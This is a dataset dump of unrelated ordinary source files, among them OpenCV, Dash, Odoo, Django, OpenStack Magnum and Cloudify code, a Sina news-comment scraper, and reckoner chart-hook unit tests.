image_2_kp, matches = findMatchesBetweenImages(image_1, image_2, 20)\n homography = findHomography(image_1_kp, image_2_kp, matches)\n result = warpImagePair(image_1, image_2, homography)\n cv2.imwrite(\"images/output/panorama_1_result.jpg\", result)","sub_path":"Assignments/Assignment8/assignment8.py","file_name":"assignment8.py","file_ext":"py","file_size_in_byte":16047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"538086439","text":"import dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objs as go\nfrom utils import Header, make_dash_table, setValue\nimport pandas as pd\nimport pathlib\nimport iddModel.doctor as idoct\nimport numpy as np\n\n\n\ndfUseDataTable = pd.DataFrame([\n ['연도별 의사 국가시험 응시현황',\n '연도별 정기 면허신고 의사 수',\n '연도별 건강보험공단 신고 요양기관 활동 의사 수',\n '연도별 의학대학, 의학전문대학원 현황',\n '연도별 사망률 추계1',\n '연도별 사망률 추계2',\n '연도별 총 인구추계',\n '연도별 군의관 입영정보',\n '활동의사 연령분포표'],\n ['기준연도, 응시자수, 합격자수',\n '연도별, 성별 의사 수',\n '연도별 의사 수',\n '입학자수, 졸업자수, 재학생수',\n '연도별, 성별, 연령별(1세) 사망률',\n '연도별, 성별, 연령별(5세) 사망률',\n '연도별 총 인구수',\n '연도별 군의관 임관 수',\n '연도별, 성별, 연령별(10세) 의사 수'],\n ['한국보건의료인 국가시험원',\n '보건복지부 통계연감',\n '건강보험공단 심사평가원',\n '교육부 통계연감',\n '통계청',\n 'United Nations',\n '통계청',\n '병무청 통계연감',\n '보건복지부 보건의료인력 실태조사'],\n ['1952년~ 2020년',\n '1955년~2019년',\n '2003년~2020년',\n '1977년~2019년',\n '1970년~2047년',\n '1950년~1970년',\n '1950년~2047년',\n '1998년~2019년',\n '2011년~2016년']]).T\n\ndfUseDataTable.index = list(range(1,10))\ndfUseDataTable.columns = ['데이터 명','데이터 항목','출처','비고']\n\ndef create_layout(app,valueSet):\n return html.Div(\n [\n Header(app),\n # page 5\n html.Div(\n [\n # 사용 데이터\n html.Div(\n [\n html.Div('사용 데이터', className=\"subtitle padded\", style={'font-weight': 'bold','fontSize': 18}),\n html.Div(\n [\n html.Br([]),\n html.Div(\n [\n html.Table(\n make_dash_table(dfUseDataTable),\n className=\"tiny-header\",\n )\n ],\n style={\"overflow-x\": \"auto\"},\n ),\n ],\n className=\"twelve columns\",\n )\n ],\n className=\"row \",\n ),\n \n\n ],\n className=\"sub_page\",\n ),\n ],\n className=\"page\",\n )\n ","sub_path":"pages/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"284744001","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api,_\n\n\nclass jolta_coa(models.Model):\n _inherit = 'account.account'\n\n def get_latest_code(self,parent_id):\n self.code = ''\n if self.parent_id and self.parent_id.code:\n self.code = ''\n if self.parent_id.parent_id and not self.parent_id.parent_id.parent_id:\n\n previous_code = self.env['account.account'].search([])\n previous_codes = self.env['account.account'].search([('parent_id', '=', parent_id.id)])\n prev_codes_list = [x.code for x in previous_codes]\n\n if prev_codes_list:\n prev_codes_list = sorted(prev_codes_list)\n prev_latest_code = prev_codes_list[-1].split('-')\n latest_code = int(prev_codes_list[-1].split('-')[-1])\n new_code = str(latest_code + 1)\n account_code = ''\n\n account_code = new_code.zfill(4)\n prev_latest_code.remove(prev_latest_code[-1])\n prev_latest_code.append(account_code)\n new_latestaccount_code = '-'.join(prev_latest_code)\n return new_latestaccount_code\n else:\n parent_code = self.parent_id.code\n latest_code_split = self.parent_id.code.split('-')\n next_code = str(int(self.parent_id.code.split('-')[-1]) + 1).zfill(4)\n latest_code_split.remove(latest_code_split[-1])\n 
latest_code_split.append(next_code)\n                new_latestaccount_code = '-'.join(latest_code_split)\n                return new_latestaccount_code\n\n\n\n\n    @api.onchange('parent_id')\n    def update_account_code(self):\n        if self.parent_id:\n            acc_code=''\n            acc_code= self.get_latest_code(self.parent_id)\n            self.code = acc_code\n\n\n\n\n\n\n\n\n","sub_path":"jolta_coa/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"563736669","text":"'''\r\n    Create a program that takes a number and returns its multiplication table\r\n'''\r\n\r\ntabla = input('Give me a number: ')\r\n\r\ntry: # like the try of a try/catch\r\n    tabla=int(tabla)\r\nexcept: # like the catch of a try/catch\r\n    print('Only numbers from 0 to 10 can be entered...')\r\n\r\n\r\nif(isinstance(tabla, int)):\r\n    # range() -> starts at 0 and counts up to the given number - 1\r\n    #range(1, 11, 2) -> starts at 1 and goes up to 10 in steps of 2\r\n    #range(0, 11, 1) -> same as the default: starts at 0 and goes up to 10 in steps of 1\r\n    for i in range(11):\r\n        print(str(tabla) + ' x ' + str(i) + ' = ' + str((tabla*i)))\r\n","sub_path":"ejer1.py","file_name":"ejer1.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"258183387","text":"# Copyright 2015 Huawei Technologies Co.,LTD.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#    http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport decorator\nfrom oslo_config import cfg\nimport pecan\n\nfrom magnum.common import exception\nfrom magnum import objects\n\n\ndef enforce_bay_types(*bay_types):\n    @decorator.decorator\n    def wrapper(func, *args, **kwargs):\n        obj = args[1]\n        bay = objects.Bay.get_by_uuid(pecan.request.context, obj.bay_uuid)\n        baymodel = objects.BayModel.get_by_uuid(pecan.request.context,\n                                                bay.baymodel_id)\n        if baymodel.coe not in bay_types:\n            raise exception.InvalidParameterValue(\n                'Cannot fulfill request with a %(bay_type)s bay, '\n                'expecting a %(supported_bay_types)s bay.' 
%\n {'bay_type': baymodel.coe,\n 'supported_bay_types': '/'.join(bay_types)})\n\n return func(*args, **kwargs)\n\n return wrapper\n\n\ndef enforce_network_driver_types_create():\n @decorator.decorator\n def wrapper(func, *args, **kwargs):\n baymodel = args[1]\n _enforce_network_driver_types(baymodel)\n return func(*args, **kwargs)\n\n return wrapper\n\n\ndef enforce_network_driver_types_update():\n @decorator.decorator\n def wrapper(func, *args, **kwargs):\n uuid = args[1]\n baymodel = objects.BayModel.get_by_uuid(pecan.request.context, uuid)\n _enforce_network_driver_types(baymodel)\n return func(*args, **kwargs)\n\n return wrapper\n\n\ndef _enforce_network_driver_types(baymodel):\n driver = baymodel.network_driver\n if driver:\n validator = Validator.get_coe_validator(baymodel.coe)\n validator.validate_network_driver(driver)\n\n\nclass Validator(object):\n\n @staticmethod\n def get_coe_validator(coe):\n if coe == 'kubernetes':\n return K8sValidator()\n if coe == 'swarm':\n return SwarmValidator()\n if coe == 'mesos':\n return MesosValidator()\n raise exception.InvalidParameterValue(\n 'Requested COE type %s is not supported.' % coe)\n\n @classmethod\n def validate_network_driver(cls, driver):\n cls._validate_network_driver_supported(driver)\n cls._validate_network_driver_allowed(driver)\n\n @classmethod\n def _validate_network_driver_supported(cls, driver):\n \"\"\"Confirm that driver is supported by Magnum for this COE.\"\"\"\n if driver not in cls.supported_drivers:\n raise exception.InvalidParameterValue(\n 'Network driver type %(driver)s is not supported, '\n 'expecting a %(supported_drivers)s network driver.' % {\n 'driver': driver,\n 'supported_drivers': '/'.join(\n cls.supported_drivers + ['unspecified'])})\n\n @classmethod\n def _validate_network_driver_allowed(cls, driver):\n \"\"\"Confirm that driver is allowed via configuration for this COE.\"\"\"\n allowed_drivers = cfg.CONF.baymodel[cls.allowed_driver_config]\n if ('all' not in allowed_drivers and\n driver not in allowed_drivers):\n raise exception.InvalidParameterValue(\n 'Network driver type %(driver)s is not allowed, '\n 'expecting a %(allowed_drivers)s network driver. '\n 'Check %(config)s configuration.' 
% {\n 'driver': driver,\n 'allowed_drivers': '/'.join(\n allowed_drivers + ['unspecified']),\n 'config': cls.allowed_driver_config})\n\n\nclass K8sValidator(Validator):\n\n supported_drivers = ['flannel']\n allowed_driver_config = 'kubernetes_allowed_network_drivers'\n\n\nclass SwarmValidator(Validator):\n\n supported_drivers = ['docker']\n allowed_driver_config = 'swarm_allowed_network_drivers'\n\n\nclass MesosValidator(Validator):\n\n supported_drivers = ['docker']\n allowed_driver_config = 'mesos_allowed_network_drivers'\n","sub_path":"magnum/api/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":4443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"145962137","text":"# Copyright 2017 British Broadcasting Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nimport uuid\nimport json\nimport os\nimport netifaces\n\nfrom .logger import Logger\n\ndef get_node_id():\n logger = Logger(\"utils\", None)\n node_id_path = \"/var/nmos-node/facade.json\"\n node_id = str(uuid.uuid1())\n try:\n if os.path.exists(node_id_path):\n f = open(node_id_path, \"r\")\n node_id = json.loads(f.read())[\"node_id\"]\n f.close()\n else:\n f = open(node_id_path, \"w\")\n f.write(json.dumps({\"node_id\": node_id}))\n f.close()\n except Exception as e:\n logger.writeWarning(\"Unable to read or write node ID. 
Using dynamically generated ID\")\n logger.writeWarning(str(e))\n return node_id\n\ndef getLocalIP():\n interfaces= netifaces.interfaces()\n for interface in interfaces:\n if (interface is not None) & (str(interface)[0:2] != 'lo'):\n try:\n for addr in netifaces.ifaddresses(interface)[netifaces.AF_INET]:\n if str(addr['addr'])[0:4] != \"127.\":\n return addr['addr']\n except KeyError:\n pass\n # Could not find an interface\n return None\n","sub_path":"nmoscommon/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"58493555","text":"from django import forms\nfrom .models import Booking\n\n\nclass BookingForm(forms.ModelForm):\n class Meta:\n model = Booking\n fields = ('listing_id', 'customer_id', 'check_in', 'check_out', 'price', 'number_of_guests')\n widgets = {\n 'listing_id': forms.HiddenInput(attrs={'readonly': 'true'}),\n 'customer_id': forms.HiddenInput(attrs={'readonly': 'true'}),\n 'check_in': forms.DateInput(attrs={'class': 'form-control date'}, format='%d-%m-%y'),\n 'check_out': forms.DateInput(attrs={'class': 'form-control date'}, format='%d-%m-%y'),\n 'price': forms.HiddenInput(attrs={'readonly': 'true', 'class': 'form-control price'}),\n 'number_of_guests': forms.NumberInput(attrs={'class': 'form-control form-control-sm '\n 'guest-box text-center text-white p-2',\n 'placeholder': 'Number of Guests',\n 'readonly': 'true'})\n }\n","sub_path":"booking/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"56585021","text":"#!/usr/bin/env python\n\nimport platform\nimport ssl\nimport subprocess\nimport tempfile\nimport os\nfrom cloudify import ctx\nfrom cloudify.state import ctx_parameters as inputs\nfrom cloudify.exceptions import NonRecoverableError\n\nCONFIG = ('\"deployment\": \"{0}\",' +\n '\"instance\": \"{1}\",' +\n '\"tenant\": \"{2}\",' +\n '\"password\": \"{3}\",' +\n '\"user\": \"{4}\",' +\n '\"host\": \"{5}\"')\n\n\ndef execute_command(command, extra_args=None):\n\n ctx.logger.debug('command: {0}.'.format(repr(command)))\n\n subprocess_args = {\n 'args': command,\n 'stdout': subprocess.PIPE,\n 'stderr': subprocess.PIPE\n }\n if extra_args is not None and isinstance(extra_args, dict):\n subprocess_args.update(extra_args)\n\n ctx.logger.debug('subprocess_args {0}.'.format(subprocess_args))\n\n process = subprocess.Popen(**subprocess_args)\n output, error = process.communicate()\n\n ctx.logger.debug('command: {0} '.format(repr(command)))\n ctx.logger.debug('output: {0} '.format(output))\n ctx.logger.debug('error: {0} '.format(error))\n ctx.logger.debug('process.returncode: {0} '.format(process.returncode))\n\n if process.returncode:\n ctx.logger.error('Running `{0}` returns {1} error: {2}.'\n .format(repr(command), process.returncode,\n repr(error)))\n return False\n\n return output\n\n\nif __name__ == '__main__':\n\n linux_distro = inputs.get('linux_distro', 'centos')\n\n cfy_deployment = \\\n inputs.get('cfy_deployment', ctx.deployment.id)\n\n cfy_instance = \\\n inputs.get('cfy_instance', ctx.instance.id)\n\n cfy_user = \\\n inputs.get('cfy_user', 'admin')\n\n cfy_pass = \\\n inputs.get('cfy_password', 'admin')\n\n cfy_tenant = \\\n inputs.get('cfy_tenant', 'default_tenant')\n\n cfy_host = \\\n inputs.get('cfy_host', 'localhost')\n\n cfy_ssl = \\\n inputs.get('cfy_ssl', False)\n\n ctx.logger.info(\"create cloudify manager 
config\")\n\n # services config\n with open(os.path.expanduser('~') + \"/cfy.json\", 'w') as outfile:\n outfile.write(\"{\" + CONFIG.format(\n cfy_deployment,\n cfy_instance,\n cfy_tenant,\n cfy_pass,\n cfy_user,\n cfy_host if not cfy_ssl else \"https://\" + cfy_host) + \"}\")\n\n if not linux_distro:\n distro, _, _ = \\\n platform.linux_distribution(full_distribution_name=False)\n linux_distro = distro.tolower()\n\n if cfy_ssl:\n ctx.logger.info(\"Set certificate as trusted\")\n\n # cert config\n _, temp_cert_file = tempfile.mkstemp()\n\n with open(temp_cert_file, 'w') as cert_file:\n cert_file.write(\"# cloudify certificate\\n\")\n cert_file.write(ssl.get_server_certificate((\n cfy_host, 443)))\n\n if 'centos' in linux_distro:\n execute_command([\n 'sudo', 'bash', '-c',\n 'cat {} >> /etc/pki/tls/certs/ca-bundle.crt'\n .format(temp_cert_file)\n ])\n else:\n raise NonRecoverableError('Unsupported platform.')\n","sub_path":"examples/cluster_blueprint/scripts/kubernetes/config-create.py","file_name":"config-create.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"395384824","text":"import os\nimport requests\nfrom lxml import etree\nimport json\nimport re\nimport time\nfrom datetime import datetime\nfrom datetime import timedelta\nimport logging\nimport traceback\nimport uuid\nimport sys\nfrom with_hdfs import HdfsClient\n\nsys.setrecursionlimit(3000)\n\n\n# 获取文件名称\nname = os.path.basename(__file__)\nname = str(name).split('.')[0]\n# 设置日志记录\nLOG_FORMAT = \"%(asctime)s %(filename)s %(levelname)s %(lineno)d %(message)s \" # 配置输出日志格式\nDATE_FORMAT = '%Y-%m-%d %H:%M:%S ' # 配置输出时间的格式,注意月份和天数不要搞乱了\n# file_name = r\"./{}-{}.log\".format(name, str(datetime.now()).split(' ')[0])\nlogging.basicConfig(level=logging.WARNING,\n format=LOG_FORMAT,\n datefmt=DATE_FORMAT,\n # filename=file_name, # 有了filename参数就不会直接输出显示到控制台,而是直接写入文件\n )\n# headle = logging.FileHandler(filename=file_name, encoding='utf-8')\nlogger = logging.getLogger()\n# logger.addHandler(headle)\n\n\nclass Spider(object):\n \"\"\"\n 这是一个爬虫模板\n \"\"\"\n def __init__(self, file_path, comment_path):\n\n self.headers_one = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36'\n }\n\n a = str(datetime.now())\n hour = a.split(' ')[-1].split(':')[0]\n num = int(hour) / 3\n num = int(num) * 3\n if num == 0: # 对于凌晨 0 点的判断\n # 时间判断部分\n date = datetime.now() - timedelta(days=1)\n news_start_time = str(date).split(' ')[0]\n yesterday = datetime.now() - timedelta(days=1) # 昨天时间\n yesterday = str(yesterday).split(' ')[0]\n else:\n # 时间判断部分\n date = datetime.now() - timedelta(days=0)\n news_start_time = str(date).split(' ')[0]\n yesterday = datetime.now() - timedelta(days=0) # 昨天时间\n yesterday = str(yesterday).split(' ')[0]\n # 定义开始时间 y-m-d 离现在时间远 news_start_time\n self.start_time = news_start_time\n # 定义结束时间 y-m-d 离现在时间近 yesterday\n self.end_time = yesterday\n logging.log(31, '爬取时间段:{}到{}'.format(self.start_time, self.end_time))\n # 定义评论的抓取时间范围\n # self.comment_start_time = yesterday # 一天回复\n # self.comment_start_time = '2019-08-01' # 一天回复\n self.comment_start_time = '' # 不限定时间回复\n self.comment_end_time = yesterday\n # self.comment_end_time = yesterday\n # 标记爬虫工作\n self.is_work = True\n self.file_name_time = self.get_file_name_time()\n self.commnet_port_url = 
'http://comment.sina.com.cn/page/info?version=1&format=json&channel=ty&newsid=comos-{}&group=0&compress=0&ie=utf-8&oe=utf-8&page={}&page_size=10&t_size=3&h_size=3&thread=1&callback=jsonp_1542676393124&_=1542676393124'\n self.page_num = 1\n self.file_path = file_path\n self.comment_apth = comment_path\n self.hdfsclient = HdfsClient(url='http://jq-chance-05:9870', user='dpp-executor')\n hour = str(datetime.now()).split(' ')[-1].split(':')[0]\n if str(hour) != '00':\n two_hour_ago = int(hour) - 2\n if len(str(two_hour_ago)) == 1:\n two_hour_ago = '0' + str(two_hour_ago)\n self.hour_name = str(two_hour_ago) + '_' + str(hour)\n else:\n self.hour_name = '22_24'\n self.hdfsclient.makedirs('{}/{}/{}'.format(self.file_path, self.file_name_time.split(' ')[0].replace('-', ''), self.hour_name)) # 创建每日文件夹\n self.hdfsclient.makedirs('{}/{}/{}'.format(self.comment_apth, self.file_name_time.split(' ')[0].replace('-', ''), self.hour_name)) # 创建每日文件夹\n self.time_time = str(time.time()).split('.')[0]\n\n def get_list_page(self, url):\n logger.log(31, '列表页url: ' + url)\n response = requests.get(url, headers=self.headers_one)\n data = json.loads(response.text[46:-14])\n list_data = data['result']['data']\n for li_data in list_data:\n news_url = li_data['url']\n ctime = li_data['ctime']\n time_local = time.localtime(float(ctime))\n # 转换成新的时间格式(2016-05-05 20:28:54)\n dt = time.strftime(\"%Y-%m-%d %H:%M:%S\", time_local) # \"%Y-%m-%d %H:%M:%S\"\n #\n try:\n self.get_news_info(news_url, '', 'http://sports.sina.com.cn/roll/index.shtml#pageid=13&lid=2503&k=&num=50&page=1', dt)\n except:\n logger.error(traceback.format_exc())\n\n def get_news_info(self, url, news_type, page_list, date_all):\n logger.log(31, '新闻url: ' + url)\n item = dict()\n response = requests.get(url, headers=self.headers_one)\n try:\n data = etree.HTML(response.content.decode())\n # 网站\n item['platform'] = '新浪新闻'\n # 标题\n try:\n title = data.xpath('.//h1[@class=\"main-title\"]/text()')[0]\n except:\n title = data.xpath('.//h2/text()')[0]\n item['title'] = title\n # date_all = data.xpath('.//div[@class=\"date-source\"]/span/text()')[0].replace('年', '-').replace('月', '-').replace('日', '')\n date = date_all.split(' ')[0]\n news_time = date_all.split(' ')[1]\n # print(date)\n item['date'] = date\n item['time'] = news_time\n # 文章来源\n try:\n article_source = data.xpath('.//div[@class=\"date-source\"]/a/text()')[0]\n except:\n article_source = data.xpath('.//p[@class=\"from\"]/span[2]//text()')\n article_source = ''.join(article_source)\n item['article_source'] = article_source\n # article_author\n try:\n article_author = data.xpath('.//div[@class=\"show_author\"]/text()')\n except:\n article_author = ''\n if article_author:\n item['article_author'] = article_author[0]\n else:\n item['article_author'] = ''\n # 内容\n try:\n content = data.xpath('.//div[@id=\"article_content\"]/div[1]/div/p/text()')\n except:\n content = data.xpath('.//em[@class=\"vdiCont\"]//text()')\n content = ''.join(content)\n # 翻页数据\n next_page = data.xpath('.//div[@data-sudaclick=\"content_pagination_p\"]/a/@href')\n if len(next_page) > 3:\n next_page = next_page[1:][:-2]\n for page_url in next_page:\n print('获取翻页数据')\n next_content = self.get_next_page(page_url)\n content = content + next_content\n\n item['content'] = content\n\n # 从接口处获取评论数\n news_id = re.search('(\\w{7}\\d{7})', url).group(0)\n try:\n comment_count = self.get_commnet_count(news_id)\n except AttributeError:\n comment_count = '0'\n item['comments_count'] = comment_count\n item['clicks'] = ''\n item['views'] = ''\n 
item['likes'] = ''\n            item['keyword'] = ''\n            item['article_url'] = url  # article detail URL\n            item['dislikes'] = ''  # number of downvotes\n            item['series_url'] = ''  # car series homepage\n            item['list_url'] = page_list  # article list URL\n            # item['article_type'] = news_type  # article type\n            item['article_type_1st'] = news_type  # article type (level 1)\n            item['article_type_2nd'] = ''  # article type (level 2)\n            item['insert_time'] = str(datetime.now()).split('.')[0]  # first crawl time\n            item['update_time'] = str(datetime.now()).split('.')[0]  # last crawl time\n            content_id = url.split('/')[-1].split('.')[0].split('_')[-1].split('-')[-1]\n            # content_id = re.search('\\\d{5,8}', content_id).group(0)\n            item['content_id'] = str(content_id)  # article id\n            item['topic_id'] = str(content_id)  # main post id\n            item['author_id'] = ''  # author id\n            item['file_code'] = '17'\n            item['reposts_count'] = ''\n            # time-window check ---------------\n            get_news_time = time.mktime(time.strptime(date, \"%Y-%m-%d\"))\n            end_time = time.mktime(time.strptime(self.end_time, \"%Y-%m-%d\"))\n            if self.start_time != '':\n                start_time = time.mktime(time.strptime(self.start_time, \"%Y-%m-%d\"))\n            else:\n                start_time = time.mktime(time.strptime('2010-1-1', \"%Y-%m-%d\"))\n            if float(get_news_time) < float(start_time):\n                self.is_work = False\n                return\n\n            if float(start_time) <= float(get_news_time) <= float(end_time):\n                self.write_news_jsonfile(item)\n                if int(comment_count) > 0:\n                    self.is_get_comment = True\n                    self.get_comments_info(news_id, title, date, news_time, url)\n        except IndexError:\n            time.sleep(5)\n            logger.error('Page request returned 404, url: {}, {}'.format(url, traceback.format_exc()))\n\n    # fetch pagination data\n    def get_next_page(self, url):\n        response = requests.get(url, headers=self.headers_one)\n        try:\n            data = etree.HTML(response.content)\n            # content\n            content = data.xpath('.//div[@id=\"article_content\"]/div[1]/div/p/text()')\n            content = ''.join(content)\n            return content\n        except:\n            content = ''\n            return content\n\n    # get the comment count\n    def get_commnet_count(self, news_id):\n        response = requests.get(self.commnet_port_url.format(news_id, str(1)))\n        data = response.content.decode()\n        data = data[20:][:-1]\n        # print(11111,data)\n        data = json.loads(data)\n        # print(222222,data)\n        # data = re.search('\"qreply\": \\\d{0,9}', data).group(0)\n        try:\n            comment_count = data['result']['count']['show']\n        except:\n            comment_count = 0\n        return comment_count\n\n    # fetch comment details\n    def get_comments_info(self, news_id, title, source_date, source_time, source_url, page_id=\"1\"):\n        item = {}\n        url = self.commnet_port_url.format(news_id, page_id)\n        response = requests.get(url)\n        data = response.content.decode()\n        # data = re.search(r'{\"result.*}\\)', data).group(0)\n        data = data[20:][:-1]\n        data = json.loads(data)\n        comments_list = data['result']['cmntlist']\n        if comments_list:\n            for comment in comments_list:\n                item['platform'] = '新浪新闻'\n                item['source_date'] = source_date\n                item['source_time'] = source_time\n                date_all = comment['time']\n                date = date_all.split(' ')[0]\n                commnet_time = date_all.split(' ')[1]\n                item['date'] = date\n                item['time'] = commnet_time\n                # time-window check for the comments ---------------\n                get_news_time = time.mktime(time.strptime(str(date), \"%Y-%m-%d\"))\n                end_time = time.mktime(time.strptime(self.comment_end_time, \"%Y-%m-%d\"))\n                if self.comment_start_time != '':\n                    start_time = time.mktime(time.strptime(self.comment_start_time, \"%Y-%m-%d\"))\n                else:\n                    start_time = time.mktime(time.strptime('2010-1-1', \"%Y-%m-%d\"))\n                if float(get_news_time) < float(start_time):\n                    self.is_get_comment = False  # replies are sorted by time, so stop crawling once the time falls below the threshold\n                    break\n                elif float(start_time) <= float(get_news_time) <= float(end_time):\n\n                    item['title'] = title\n                    
author = comment['nick']\n                    item['author'] = author\n                    item['author_id'] = comment['uid']  # user id\n                    content = comment['content']\n\n                    item['content'] = content\n                    item['floor'] = ''\n                    item['keyword'] = ''\n                    item['source_url'] = source_url\n                    comment_url = 'http://comment5.news.sina.com.cn/comment/skin/default.html?channel=ty&newsid=comos-{}&group=0'.format(\n                        news_id)\n                    item['comment_url'] = comment_url\n                    item['views'] = ''\n                    item['comments_count'] = ''\n                    likes = comment['agree']\n                    item['likes'] = likes\n                    item['dislikes'] = ''  # number of downvotes\n                    item['insert_time'] = str(datetime.now()).split('.')[0]  # first crawl time\n                    item['update_time'] = str(datetime.now()).split('.')[0]  # last crawl time\n                    item['content_id'] = str(uuid.uuid4()).replace('-', '')\n                    topic_id = source_url.split('/')[-1].split('.')[0].split('_')[-1].split('-')[-1]\n                    # topic_id = re.search('\\\d{5,8}', topic_id).group(0)\n                    item['topic_id'] = topic_id  # main post id\n                    item['file_code'] = '31'\n                    item['reposts_count'] = ''\n                    self.write_comment_jsonfile(item)\n            if self.is_get_comment:\n                self.page_num += 1\n                self.get_comments_info(news_id, title, source_date, source_time, source_url,page_id=str(self.page_num))\n            else:\n                self.page_num = 1\n                logger.log(31, 'Comment crawling finished ' + url)\n    # ------------------------------------------------ new-energy module --------------------------------------------------------\n\n    def get_file_name_time(self):\n        a = str(datetime.now())\n        hour = a.split(' ')[-1].split(':')[0]\n        num = int(hour) / 3\n        num = int(num) * 3\n        if num == 0:\n            num = 24\n            a = str(datetime.now() - timedelta(days=1))  # yesterday's date\n        num = a.split(' ')[0] + ' ' + str(num)\n        return num\n\n    def write_news_jsonfile(self, item):\n        item = json.dumps(dict(item), ensure_ascii=False) + '\\n'\n        # print('writing json data')\n        # with open('./../sina/17_sina_news.json', 'ab') as f:\n        #     f.write(item.encode(\"utf-8\"))\n        self.hdfsclient.new_write('{}/{}/{}/17_{}_{}_sina_news.json'.format(self.file_path, self.file_name_time.split(' ')[0].replace('-', ''), self.hour_name, str(datetime.now()).split(' ')[0].replace('-', '_'), self.time_time), item,encoding='utf-8')\n\n    def write_comment_jsonfile(self, item):\n        item = json.dumps(dict(item), ensure_ascii=False) + '\\n'\n        # with open('./../sina/31_sina_comment.json', 'ab') as f:\n        #     f.write(item.encode(\"utf-8\"))\n        self.hdfsclient.new_write('{}/{}/{}/31_{}_{}_sina_comment.json'.format(self.comment_apth, self.file_name_time.split(' ')[0].replace('-', ''), self.hour_name, str(datetime.now()).split(' ')[0].replace('-', '_'), self.time_time), item,encoding='utf-8')\n\n    def run(self):\n        for i in range(1, 20):\n            url = 'http://feed.mix.sina.com.cn/api/roll/get?pageid=13&lid=2503&k=&num=50&page={}&r=0.6019004029484454&callback=jQuery311016308312964736538_1566799251373&_=1566799251388'.format(str(i))\n            self.get_list_page(url)\n\n\nif __name__ == \"__main__\":\n    print(sys.argv)\n    file_path = sys.argv[1]\n    comment_path = sys.argv[2]\n    spider = Spider(file_path, comment_path)\n    try:\n        spider.run()\n    except:\n        logger.critical(traceback.format_exc())\n\n    logger.log(31, 'Program finished......')\n","sub_path":"Dai/sina/sina_hour.py","file_name":"sina_hour.py","file_ext":"py","file_size_in_byte":15986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"459765359","text":"def myPow( x, n):\n    if n == 0:\n        return 1\n    elif n < 0:\n        x = 1/x\n        n = -n\n    ans = 1.0\n    while n > 0:\n        if n&1 :\n            ans *= x\n        x *= x\n        n >>= 1\n    return 
ans\nx=float(input());\nn=int(input());\nprint('%.5f'%myPow(x,n))","sub_path":"Code/CodeRecords/2070/60785/318858.py","file_name":"318858.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"149794464","text":"# Copyright 2019 FairwindsOps Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Test the chart functions directly\"\"\"\nimport unittest\nimport mock\nfrom reckoner.chart import Chart, ChartResult\nfrom reckoner.command_line_caller import Response\nfrom reckoner.exception import ReckonerCommandException\nfrom reckoner.yaml.handler import Handler\nfrom io import StringIO\n\n\n@mock.patch('reckoner.chart.Repository')\n@mock.patch('reckoner.chart.Config')\n# I have to strictly design the mock for Reckoner due to the nature of the\n# key/val class setup. If the class actually had attributes then this\n# would be more easily mockable\n@mock.patch('reckoner.chart.call')\nclass TestChartHooks(unittest.TestCase):\n def get_chart(self, *args):\n chart = Chart(\n {'name': {\n 'hooks': {\n 'pre_install': [\n 'omg',\n ],\n 'post_install': [\n 'fetchez --la-vache',\n 'mooooooooo!',\n ]\n }\n }\n },\n None,\n )\n chart.config.dryrun = False\n\n return chart\n\n def test_execution_directory(self, mock_cmd_call, *args):\n \"\"\"Assert that we're executing in the same directory as the course yml\"\"\"\n _path = '/path/where/course/lives/'\n _fake_command = 'fake --command'\n chart = self.get_chart()\n chart.hooks = {\n 'pre_install': [\n _fake_command\n ]\n }\n chart.config.course_base_directory = _path\n mock_cmd_call.side_effect = [Response(command_string=_fake_command, stderr='err-output', stdout='output', exitcode=0)]\n chart.run_hook('pre_install')\n mock_cmd_call.assert_called_with(_fake_command, shell=True, executable='/bin/bash', path=_path)\n\n def test_caught_exceptions(self, mock_cmd_call, 